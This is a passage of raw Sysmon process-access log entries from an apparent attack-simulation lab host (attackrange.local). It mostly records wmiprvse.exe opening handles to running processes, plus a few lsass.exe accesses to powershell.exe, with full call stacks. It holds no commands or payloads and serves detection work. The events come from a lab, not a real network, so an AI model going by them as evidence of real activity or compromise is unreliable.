16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla 